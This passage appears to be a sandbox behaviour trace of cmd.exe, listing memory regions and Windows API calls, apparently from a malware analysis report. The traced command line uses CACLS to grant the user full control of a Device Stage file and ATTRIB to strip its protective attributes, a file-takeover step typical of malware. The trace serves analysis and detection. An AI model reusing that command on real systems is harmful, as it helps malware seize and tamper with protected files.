"private_0x0000000000210000" filename = "" Region: id = 18964 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 18965 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18966 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 18967 start_va = 
0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18968 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 18969 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 18970 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 18971 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 18972 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 18973 start_va = 0x200000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 18974 start_va = 0x410000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 18975 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 18976 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 18977 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 18978 start_va = 0x76910000 end_va = 
0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 18979 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 18980 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 18981 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 18982 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 18983 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 18984 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 18985 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 18986 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 18987 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename 
= "" Region: id = 18988 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 18989 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 18990 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 18991 start_va = 0x510000 end_va = 0x610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 18992 start_va = 0x620000 end_va = 0x121ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 18993 start_va = 0x1220000 end_va = 0x1382fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001220000" filename = "" Region: id = 18994 start_va = 0x1390000 end_va = 0x165efff entry_point = 0x1390000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 284 os_tid = 0xc20 [0148.952] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30fcfc | out: lpSystemTimeAsFileTime=0x30fcfc*(dwLowDateTime=0x92b6fec0, dwHighDateTime=0x1d440a9)) [0148.952] GetCurrentProcessId () returned 0xb00 [0148.952] GetCurrentThreadId () returned 0xc20 [0148.952] GetTickCount () returned 0x2e2c0 [0148.952] QueryPerformanceCounter (in: lpPerformanceCount=0x30fcf4 | out: lpPerformanceCount=0x30fcf4*=20574136324) returned 1 [0148.953] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0148.953] __set_app_type (_Type=0x1) [0148.953] __p__fmode () returned 0x76b331f4 [0148.953] __p__commode () returned 0x76b331fc [0148.953] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0148.953] __getmainargs (in: _Argc=0x4a9e4238, 
_Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0148.953] GetCurrentThreadId () returned 0xc20 [0148.954] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc20) returned 0x38 [0148.954] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0148.954] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0148.954] SetThreadUILanguage (LangId=0x0) returned 0x409 [0148.954] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0148.954] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30fc8c | out: phkResult=0x30fc8c*=0x0) returned 0x2 [0148.954] VirtualQuery (in: lpAddress=0x30fcc3, lpBuffer=0x30fc5c, dwLength=0x1c | out: lpBuffer=0x30fc5c*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0148.954] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30fc5c, dwLength=0x1c | out: lpBuffer=0x30fc5c*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0148.954] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30fc5c, dwLength=0x1c | out: lpBuffer=0x30fc5c*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0148.954] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30fc5c, dwLength=0x1c | out: lpBuffer=0x30fc5c*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0148.954] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30fc5c, dwLength=0x1c | out: 
lpBuffer=0x30fc5c*(BaseAddress=0x310000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x100000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0148.954] GetConsoleOutputCP () returned 0x1b5 [0148.954] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0148.955] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0148.955] _get_osfhandle (_FileHandle=1) returned 0x7 [0148.955] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0148.955] _get_osfhandle (_FileHandle=1) returned 0x7 [0148.955] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0148.955] _get_osfhandle (_FileHandle=1) returned 0x7 [0148.955] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0148.955] _get_osfhandle (_FileHandle=0) returned 0x3 [0148.955] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0148.956] _get_osfhandle (_FileHandle=0) returned 0x3 [0148.956] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0148.956] GetEnvironmentStringsW () returned 0x420370* [0148.956] FreeEnvironmentStringsW (penv=0x420370) returned 1 [0148.956] GetEnvironmentStringsW () returned 0x420370* [0148.956] FreeEnvironmentStringsW (penv=0x420370) returned 1 [0148.956] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30ebfc | out: phkResult=0x30ebfc*=0x40) returned 0x0 [0148.956] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30ec04, lpData=0x30ec08, lpcbData=0x30ec00*=0x1000 | out: lpType=0x30ec04*=0x0, lpData=0x30ec08*=0x20, lpcbData=0x30ec00*=0x1000) returned 0x2 [0148.956] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30ec04, lpData=0x30ec08, lpcbData=0x30ec00*=0x1000 | out: lpType=0x30ec04*=0x4, lpData=0x30ec08*=0x1, lpcbData=0x30ec00*=0x4) returned 
0x0 [0148.957] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30ec04, lpData=0x30ec08, lpcbData=0x30ec00*=0x1000 | out: lpType=0x30ec04*=0x0, lpData=0x30ec08*=0x1, lpcbData=0x30ec00*=0x1000) returned 0x2 [0148.957] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30ec04, lpData=0x30ec08, lpcbData=0x30ec00*=0x1000 | out: lpType=0x30ec04*=0x4, lpData=0x30ec08*=0x0, lpcbData=0x30ec00*=0x4) returned 0x0 [0148.957] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30ec04, lpData=0x30ec08, lpcbData=0x30ec00*=0x1000 | out: lpType=0x30ec04*=0x4, lpData=0x30ec08*=0x40, lpcbData=0x30ec00*=0x4) returned 0x0 [0148.957] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30ec04, lpData=0x30ec08, lpcbData=0x30ec00*=0x1000 | out: lpType=0x30ec04*=0x4, lpData=0x30ec08*=0x40, lpcbData=0x30ec00*=0x4) returned 0x0 [0148.957] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30ec04, lpData=0x30ec08, lpcbData=0x30ec00*=0x1000 | out: lpType=0x30ec04*=0x0, lpData=0x30ec08*=0x40, lpcbData=0x30ec00*=0x1000) returned 0x2 [0148.957] RegCloseKey (hKey=0x40) returned 0x0 [0148.957] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30ebfc | out: phkResult=0x30ebfc*=0x40) returned 0x0 [0148.957] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30ec04, lpData=0x30ec08, lpcbData=0x30ec00*=0x1000 | out: lpType=0x30ec04*=0x0, lpData=0x30ec08*=0x40, lpcbData=0x30ec00*=0x1000) returned 0x2 [0148.957] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30ec04, lpData=0x30ec08, lpcbData=0x30ec00*=0x1000 | out: lpType=0x30ec04*=0x4, lpData=0x30ec08*=0x1, lpcbData=0x30ec00*=0x4) returned 0x0 [0148.957] RegQueryValueExW (in: hKey=0x40, 
lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30ec04, lpData=0x30ec08, lpcbData=0x30ec00*=0x1000 | out: lpType=0x30ec04*=0x0, lpData=0x30ec08*=0x1, lpcbData=0x30ec00*=0x1000) returned 0x2 [0148.957] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30ec04, lpData=0x30ec08, lpcbData=0x30ec00*=0x1000 | out: lpType=0x30ec04*=0x4, lpData=0x30ec08*=0x0, lpcbData=0x30ec00*=0x4) returned 0x0 [0148.957] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30ec04, lpData=0x30ec08, lpcbData=0x30ec00*=0x1000 | out: lpType=0x30ec04*=0x4, lpData=0x30ec08*=0x9, lpcbData=0x30ec00*=0x4) returned 0x0 [0148.957] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30ec04, lpData=0x30ec08, lpcbData=0x30ec00*=0x1000 | out: lpType=0x30ec04*=0x4, lpData=0x30ec08*=0x9, lpcbData=0x30ec00*=0x4) returned 0x0 [0148.957] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30ec04, lpData=0x30ec08, lpcbData=0x30ec00*=0x1000 | out: lpType=0x30ec04*=0x0, lpData=0x30ec08*=0x9, lpcbData=0x30ec00*=0x1000) returned 0x2 [0148.957] RegCloseKey (hKey=0x40) returned 0x0 [0148.957] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886377 [0148.957] srand (_Seed=0x5b886377) [0148.957] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png\"" [0148.957] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png\"" 
[0148.958] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0148.958] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x421ad0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0148.958] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0148.958] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0148.958] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0148.958] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0148.958] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0148.958] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0148.959] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0148.959] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0148.959] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0148.959] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0148.959] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0148.959] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0148.959] GetEnvironmentStringsW () returned 0x4224c0* [0148.959] FreeEnvironmentStringsW (penv=0x4224c0) returned 1 [0148.959] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0148.959] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0148.959] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 
[0148.959] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0148.959] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0148.959] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0148.959] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0148.959] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0148.959] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0148.959] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0148.959] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30f9c8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0148.959] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x30f9c8, lpFilePart=0x30f9c4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30f9c4*="Desktop") returned 0x18 [0148.960] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0148.960] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f744 | out: lpFindFileData=0x30f744) returned 0x420b50 [0148.960] FindClose (in: hFindFile=0x420b50 | out: hFindFile=0x420b50) returned 1 [0148.960] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x30f744 | out: lpFindFileData=0x30f744) returned 0x420b50 [0148.960] FindClose (in: hFindFile=0x420b50 | out: hFindFile=0x420b50) returned 1 [0148.960] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x30f744 | out: lpFindFileData=0x30f744) returned 0x420b50 [0148.960] FindClose (in: hFindFile=0x420b50 | out: hFindFile=0x420b50) returned 1 [0148.960] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0148.961] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0148.961] SetEnvironmentVariableW (lpName="=C:", 
lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0148.961] GetEnvironmentStringsW () returned 0x420370* [0148.961] FreeEnvironmentStringsW (penv=0x420370) returned 1 [0148.961] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0148.961] GetConsoleOutputCP () returned 0x1b5 [0148.962] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0148.962] GetUserDefaultLCID () returned 0x409 [0148.962] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0148.962] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30fb08, cchData=128 | out: lpLCData="0") returned 2 [0148.962] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30fb08, cchData=128 | out: lpLCData="0") returned 2 [0148.962] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30fb08, cchData=128 | out: lpLCData="1") returned 2 [0148.962] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0148.962] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0148.962] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0148.962] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0148.963] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0148.963] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0148.963] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0148.963] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0148.963] 
GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0148.963] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0148.963] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0148.964] GetConsoleTitleW (in: lpConsoleTitle=0x410a00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0148.964] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0148.964] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0148.964] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0148.964] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0148.965] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0148.966] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0148.966] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0148.966] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0148.966] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0148.966] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0148.966] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0148.966] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0148.971] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0148.971] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0148.971] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0148.971] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0148.971] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0148.971] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0148.971] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0148.975] SetErrorMode (uMode=0x0) returned 0x0 [0148.975] SetErrorMode (uMode=0x1) returned 
0x0 [0148.975] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x422018, lpFilePart=0x30f2bc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30f2bc*="Desktop") returned 0x18 [0148.976] SetErrorMode (uMode=0x0) returned 0x1 [0148.976] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0148.976] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0148.980] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0148.980] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x30f038, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f038) returned 0xffffffff [0148.981] GetLastError () returned 0x2 [0148.981] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x30f038, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f038) returned 0xffffffff [0148.981] GetLastError () returned 0x2 [0148.981] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x30f038, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f038) returned 0x410f58 [0148.981] FindClose (in: hFindFile=0x410f58 | out: hFindFile=0x410f58) returned 1 [0148.981] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x30f038, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f038) returned 0xffffffff [0148.981] GetLastError () returned 0x2 [0148.981] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x30f038, 
fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f038) returned 0x410f58 [0148.981] FindClose (in: hFindFile=0x410f58 | out: hFindFile=0x410f58) returned 1 [0148.982] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0148.982] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0148.982] GetConsoleTitleW (in: lpConsoleTitle=0x30f530, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0148.982] InitializeProcThreadAttributeList (in: lpAttributeList=0x30f3b8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30f480 | out: lpAttributeList=0x30f3b8, lpSize=0x30f480) returned 1 [0148.982] UpdateProcThreadAttribute (in: lpAttributeList=0x30f3b8, dwFlags=0x0, Attribute=0x60001, lpValue=0x30f478, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30f3b8, lpPreviousValue=0x0) returned 1 [0148.982] GetStartupInfoW (in: lpStartupInfo=0x30f374 | out: lpStartupInfo=0x30f374*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0148.982] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0148.983] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, 